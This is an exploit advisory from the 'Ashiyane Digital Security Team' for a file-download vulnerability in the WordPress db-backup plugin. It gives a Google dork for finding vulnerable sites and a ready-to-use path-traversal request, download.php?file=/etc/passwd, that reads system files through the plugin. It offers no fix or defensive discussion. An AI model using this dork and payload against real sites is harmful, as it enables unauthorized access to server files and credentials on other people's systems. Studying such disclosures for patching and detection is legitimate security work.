29 lines
No EOL
1.1 KiB
Text
29 lines
No EOL
1.1 KiB
Text
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|
|
|-------------------------------------------------------------------------|
|
|
|[*] Exploit Title: Wordpress db-backup plugin File Download Vulnerability
|
|
|
|
|
|[*] Google Dork: inurl:wp-content/plugins/db-backup/
|
|
|
|
|
|[*] Date : Date: 2014-11-26
|
|
|
|
|
|[*] Exploit Author: Ashiyane Digital Security Team
|
|
|
|
|
|[*] Vendor Homepage : https://wordpress.org/plugins/wp-database-backup/
|
|
|
|
|
|[*] Plugin Link : https://downloads.wordpress.org/plugin/wp-database-backup.zip
|
|
|
|
|
|[*] Tested on: Windows 7
|
|
|
|
|
|[*] Discovered By : ACC3SS
|
|
|
|
|
|-------------------------------------------------------------------------|
|
|
|
|
|
|[*] Location :[localhost]/wp-content/plugins/db-backup/download.php?file=/etc/passwd
|
|
|
|
|
|-------------------------------------------------------------------------|
|
|
|
|
|
|
|
|
|-------------------------------------------------------------------------|
|
|
|-------------------------------------------------------------------------|
|
|
|-------------------------------------------------------------------------|
|
|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#| |